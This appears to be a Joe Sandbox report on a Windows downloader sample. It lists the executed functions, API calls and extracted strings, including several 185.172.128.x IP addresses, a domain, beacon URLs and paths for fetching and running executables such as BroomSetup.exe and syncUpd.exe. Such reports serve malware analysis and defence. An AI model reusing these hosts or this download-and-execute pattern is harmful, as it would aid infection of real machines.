Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 416 -s 2256
Imagebase:	0x2c0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	2.5%
Signature Coverage:	13.2%
Total number of Nodes:	1100
Total number of Limit Nodes:	15

Executed Functions

Function 0042676C Relevance: 51.9, APIs: 16, Strings: 13, Instructions: 1148
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00426771
WSAStartup.WS2_32(00000202,?), ref: 004273FD
socket.WS2_32(00000002,00000001,00000006), ref: 00427413
WSACleanup.WS2_32 ref: 0042742D
gethostbyname.WS2_32(00000000), ref: 00427441
htons.WS2_32(?), ref: 00427473
connect.WS2_32(00000000,?,00000010), ref: 00427484
send.WS2_32(00000000,00000000,00000000,00000000), ref: 004274A7
send.WS2_32(00000000,00000000,?,00000000), ref: 004274C3
recv.WS2_32(00000000,00000000,00000001,00000000), ref: 00427503
recv.WS2_32(?,00000000,00000001,00000000), ref: 00427681
recv.WS2_32(?,?,00000000,00000000), ref: 00427720
recv.WS2_32(?,0000000A,00000002,00000000), ref: 00427747
recv.WS2_32(00000000,?,?,00000000), ref: 004277A8
WSACleanup.WS2_32 ref: 004277E6
closesocket.WS2_32(?), ref: 004277ED

Strings

HTTP/1.1 200 OK, xrefs: 0042678D, 0042683A, 0042754B
185.172.128.228, xrefs: 0042677C
GET , xrefs: 00426AF5, 00426B17, 00426B31
(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36, xrefs: 00427015, 0042729B, 004272B2
Content-Length, xrefs: 00426853, 004268ED, 004275AB
Transfer-Encoding, xrefs: 0042690B, 004269C9, 004275E7
POST , xrefs: 00426AA7, 00426AD5, 00426B39
/ping.php?substr=%s, xrefs: 0042677D
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 , xrefs: 00426D1E, 00426FEC, 00427003
HTTP/1.1, xrefs: 00426B5E, 00426BBC, 00426BD3
Host: , xrefs: 00426BF2, 00426C2C, 00426C43
chunked, xrefs: 004269E7, 00426A2D, 004275F8
User-Agent: , xrefs: 00426C73, 00426CF5, 00426D0C

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
String ID: HTTP/1.1$(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36$/ping.php?substr=%s$185.172.128.228$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
API String ID: 791229064-1542616328
Opcode ID: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
Instruction ID: 4e55451fc037eb126e07087a8435dc815b4e607a9865e0499e256671a6cdd487
Opcode Fuzzy Hash: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
Instruction Fuzzy Hash: F39287209062E19ACB02FFB56C5659E7FF4591530D714747FE690AF393CB2C86088B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00424A0E Relevance: 48.6, APIs: 2, Strings: 25, Instructions: 1388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004265BC: __EH_prolog.LIBCMT ref: 004265C1

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 00424AD4

Part of subcall function 0042604A: __EH_prolog.LIBCMT ref: 0042604F
Part of subcall function 0042604A: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131

Strings

P, xrefs: 00425B10
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 00424DB6, 00424F4C, 00424F65
/timeSync.exe, xrefs: 0042575F, 004257F2, 00425860
/1/Package.zip, xrefs: 00425A14, 00425AAE, 00425B08
SOFTWARE\BroomCleaner, xrefs: 004250F1, 004251E5
/ping.php?substr=%s, xrefs: 00425387, 0042545D, 00425475
/BroomSetup.exe, xrefs: 00425DE7, 00425E8D, 00425EDB
Installed, xrefs: 004251FF, 0042525D
note.padd.cn.com, xrefs: 00425942, 004259FA, 00425AFF
.exe, xrefs: 004258B1, 004258D3
sub=([\w-]{1,255}), xrefs: 00424AA2
185.172.128.228, xrefs: 004252C0, 00425366, 004254E5
.zip, xrefs: 00425B5D, 00425B7F
.exe, xrefs: 00425F26, 00425F48
P, xrefs: 00425855
185.172.128.203, xrefs: 004255F7, 0042569D, 0042583F
P, xrefs: 00425EE3
185.172.128.228, xrefs: 00425D21, 00425DCD, 00425ED2
185.172.128.90, xrefs: 00424FB3, 0042504D, 0042509B
185.172.128.59, xrefs: 0042553C, 004255D6, 0042584D
\run.exe, xrefs: 00425BD0, 00425C28
/syncUpd.exe, xrefs: 004256BC, 0042573E, 0042586F
P, xrefs: 004254F5
eight, xrefs: 00424CE5, 00424D18
P, xrefs: 004250AB

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: .exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$eight$note.padd.cn.com$sub=([\w-]{1,255})
API String ID: 2531350358-2497335110
Opcode ID: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
Instruction ID: d125a89a0ba1aec4cd60c53361ca74c042bcd3054cac0714d62587379a507679
Opcode Fuzzy Hash: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
Instruction Fuzzy Hash: EFB2131050A2E19AC712FB7958567CA2FE49B62309F54687FE7D01F2A3CB78460C87DE

Uniqueness

Uniqueness Score: -1.00%

Function 0042628B Relevance: 12.3, APIs: 8, Instructions: 275
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 004262AD
CoCreateInstance.OLE32(00429220,00000000,00000001,00429210,?,?,?,?,?,?,?,?,?,?,?,/ping.php?substr=%s), ref: 004262C7
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00426309
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426311
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 00426338
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 0042634E
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426355
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 0042637A

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString$CreateInitializeInstance
String ID:
API String ID: 3070066007-0
Opcode ID: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
Instruction ID: 83f5cca910cad30c2957a1169f386ac85e7f4b82ddc6b65933772462ec616701
Opcode Fuzzy Hash: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
Instruction Fuzzy Hash: 3A914B75A00218AFDB04DFA8D888AEEBBB9FF49314F544559F805EB241D776AC02CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004139E7 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
ExitProcess.KERNEL32 ref: 00413A21

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction ID: 8e17948dea93fcc861bafccf52e4138581932e64e8d8508709b4de54f2ab24c4
Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction Fuzzy Hash: 83E0B631100108ABCF21AF65DD09A993B69EF54786F444029F9869A232DB39EE92CA48

Uniqueness

Uniqueness Score: -1.00%

Function 04255BD6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 04255BFE
Module32First.KERNEL32(00000000,00000224), ref: 04255C1E

Memory Dump Source

Source File: 00000000.00000002.1986065052.0000000004255000.00000040.00000020.00020000.00000000.sdmp, Offset: 04255000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4255000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 50eb7f319c858c59c5c332f40e96768ad7a1721f2a14175363a443086caf02e3
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 4AF06231210711BBE7203AB5988DB6E76F8AF49725F100568EA42954D4DA70F8C54A61

Uniqueness

Uniqueness Score: -1.00%

Function 0041A242 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00419F10: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

GetLastError.KERNEL32 ref: 0041A356
__dosmaperr.LIBCMT ref: 0041A35D
GetFileType.KERNEL32(00000000), ref: 0041A369
GetLastError.KERNEL32 ref: 0041A373
__dosmaperr.LIBCMT ref: 0041A37C
CloseHandle.KERNEL32(00000000), ref: 0041A39C
CloseHandle.KERNEL32(?), ref: 0041A4E6
GetLastError.KERNEL32 ref: 0041A518
__dosmaperr.LIBCMT ref: 0041A51F

Strings

H, xrefs: 0041A4A4

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 975f7ae23b976af0f57ba7f63c5262953fac7c3e1b8646b278d3dfb303d0f39f
Instruction ID: 6253cfc56dbab61e205766efb0611ca8061eb8c5ebbdbf8fd01913e42387971c
Opcode Fuzzy Hash: 975f7ae23b976af0f57ba7f63c5262953fac7c3e1b8646b278d3dfb303d0f39f
Instruction Fuzzy Hash: A4A13632A041089FDF199F78D8517EE7BA1AB06324F14019EEC15EB391D7398DA2C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004192AD Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76cb713194fa4f728ec747c36cb0267ce7d8b1f5e695f35cd7f37fd194786d6
Instruction ID: c4abe014ee414803f6a4a6dca87339887fd42b2314c6943b79fa01ee0dc397dc
Opcode Fuzzy Hash: e76cb713194fa4f728ec747c36cb0267ce7d8b1f5e695f35cd7f37fd194786d6
Instruction Fuzzy Hash: 1CC13AB1E04249AFDB11CFA9C850BEE7BB1BF09314F04019AE954A7392C7389DC1CB69

Uniqueness

Uniqueness Score: -1.00%

Function 05BE003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 05BE024D

Strings

kernel32.dll, xrefs: 05BE008F, 05BE0095
cess, xrefs: 05BE018D

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 1b9114603165be06c710c5a6c0a91e16bcbdd2ada135c92ceebb1f85711d3944
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 9C526974A01229DFDB64DF68C984BACBBB1BF09304F1480D9E94DAB351DB70AA85DF14

Uniqueness

Uniqueness Score: -1.00%

Function 0042615A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0042615F
RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 00426187
RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 0042620A
RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042622B

Strings

Installed, xrefs: 00426169, 00426197, 004261B6, 004261B7
SOFTWARE\BroomCleaner, xrefs: 00426167, 0042617A

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 9742427db463fe4f6bb28d71d590d7309dc6e65af80fb6a01f8e3694ad2225c2
Instruction ID: 7631ba6f6479b49e2955b4a66f7b67ea7b8ea0f8d2650bf46820f955d15f7583
Opcode Fuzzy Hash: 9742427db463fe4f6bb28d71d590d7309dc6e65af80fb6a01f8e3694ad2225c2
Instruction Fuzzy Hash: F3319A71A00129EEDF149FA8DC94AFEBB78EB08348F44016EE80277281C7B11D05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00426510 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExA.SHELL32(?,.exe), ref: 00426552
WaitForSingleObject.KERNEL32(?,00008000), ref: 00426566
CloseHandle.KERNEL32(?), ref: 0042656F

Strings

.exe, xrefs: 0042651B

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: .exe
API String ID: 3837156514-4119554291
Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction ID: 8ce7cd6e21d80bec1428d2ca161df36b0ad46b5534dc267783c352d5b9ba18c9
Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction Fuzzy Hash: 1B015A31E00218ABDF15DFA9E8459DDBBB8FF08340F418126F801A6260EB709A45CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00426242 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,0042590D,00000001,?,/ping.php?substr=%s), ref: 0042625D
WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 00426275
FindCloseChangeNotification.KERNEL32(00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 0042627E

Strings

.exe, xrefs: 00426247

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID: .exe
API String ID: 3805958096-4119554291
Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction ID: 1160b3d028a4f0b3eb39880a7a2cc02b481a356c14d22bba427b687e2e61c155
Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction Fuzzy Hash: 19E06D72701224BBD7311B9AAC48FABBE6CEF86AA4F040165FB05D2110A6A1DC0197B8

Uniqueness

Uniqueness Score: -1.00%

Function 004163FD Relevance: 4.6, APIs: 3, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 00416453
GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 0041645D
__dosmaperr.LIBCMT ref: 00416488

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
Instruction ID: 375721714d43bc4782e6a43c23cd9332c59ec42f2299351a345cb8f3503d09eb
Opcode Fuzzy Hash: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
Instruction Fuzzy Hash: EA014E3360412016D6256635E8457FF67599B82738F2B017FFD188B2D2EB6CDCC2819D

Uniqueness

Uniqueness Score: -1.00%

Function 00419767 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
__dosmaperr.LIBCMT ref: 004197B1

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: dad49dafcb6aaf0294d2e2872a6b63d175876bddee0454d410784651848899ac
Instruction ID: ffc3df5eb890e326191760c687c06a6ec256fa7eb9c4ce0b7ceac38b7dc3edc6
Opcode Fuzzy Hash: dad49dafcb6aaf0294d2e2872a6b63d175876bddee0454d410784651848899ac
Instruction Fuzzy Hash: 70012D36620119ABCB159F59DC059EE7B29DF85330B28024AFC219B2D0E6749C918798

Uniqueness

Uniqueness Score: -1.00%

Function 004264F9 Relevance: 4.5, APIs: 3, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(?), ref: 00426502
SysFreeString.OLEAUT32(?), ref: 00426507
CoUninitialize.OLE32 ref: 00426509

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: FreeString$Uninitialize
String ID:
API String ID: 1985688103-0
Opcode ID: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
Instruction ID: 20283bebf02f6add892787a5acbccff6c180d450b55e9b59979360a618d6bcd4
Opcode Fuzzy Hash: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
Instruction Fuzzy Hash: A6B09230D02029ABEF22AB62EE0D45C7F32FF40350F410061F405332308B351D22EE88

Uniqueness

Uniqueness Score: -1.00%

Function 00419CC3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

Strings

@, xrefs: 00419D84

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: CreateFile
String ID: @
API String ID: 823142352-2766056989
Opcode ID: 19ae29186eb238c1cffb342219aeaf7137875d95b9a5eb57b690caaf41f6485a
Instruction ID: 6e2d9e324c610adb1979779f65b1bd98f37231a06814a81205b09b8777469d26
Opcode Fuzzy Hash: 19ae29186eb238c1cffb342219aeaf7137875d95b9a5eb57b690caaf41f6485a
Instruction Fuzzy Hash: 4D61E671900209AAEF259E28ECA1BFF3659DB01324F280667F914D63E1D37DCDD1C299

Uniqueness

Uniqueness Score: -1.00%

Function 00401BB2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081

Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

v*@, xrefs: 00401BD0

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
String ID: v*@
API String ID: 3966877926-3062513736
Opcode ID: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
Instruction ID: cee5f8951f4aa60660b8f0772aceb561b5f660f34992c4678438f01180239965
Opcode Fuzzy Hash: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
Instruction Fuzzy Hash: FC218EB1611106AFD708DF59C849A6AB7F9FF48348F14822EE116A7341C7B8DD008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042604A Relevance: 3.1, APIs: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042604F

Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 420165198-0
Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction ID: 115bff912634c1bae9a386948b342ebf01da51d0a41a8c3d45e1fed53d0017c0
Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction Fuzzy Hash: 3531F770D01119EBDB14EF95E985AEDFBB4FF48304F1081AEE405B3681DB786A04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 05BE0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,05BE0223,?,?), ref: 05BE0E19
SetErrorMode.KERNEL32(00000000,?,?,05BE0223,?,?), ref: 05BE0E1E

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: ada40a7cb8544c2f753c51c602ace53c42d51f540c632c77ac49917344a152bb
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 90D0123154512C77D7003A94DC0DBCD7B1CDF09B62F048061FB0DD9080C7B0954046E5

Uniqueness

Uniqueness Score: -1.00%

Function 0041878B Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89ee0429e7c3b78fee215e5908ca075a1a99ef19cdf9331575feb5a3c314da26
Instruction ID: 7f647bd7b68c58480356602612fa02c60fce203f31c4afd0b56fb408a9d690c1
Opcode Fuzzy Hash: 89ee0429e7c3b78fee215e5908ca075a1a99ef19cdf9331575feb5a3c314da26
Instruction Fuzzy Hash: 2851F771A00108AFDB10DF69C840BFA7BA5EF85364F59815EE8489B392CB39DD82C795

Uniqueness

Uniqueness Score: -1.00%

Function 00401F2B Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00402008

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
Instruction ID: 92d79e160b507baa56e58511ea190f57013b3733b8d645c4d1d18e9f5b661b4d
Opcode Fuzzy Hash: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
Instruction Fuzzy Hash: EA317C31604706AFD710DE29C884A5ABBA0BF88354F04863FFD54A73A1D779D854CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004024A1 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004024A6

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: Exception@8H_prologThrowstd::system_error::system_error
String ID:
API String ID: 938716162-0
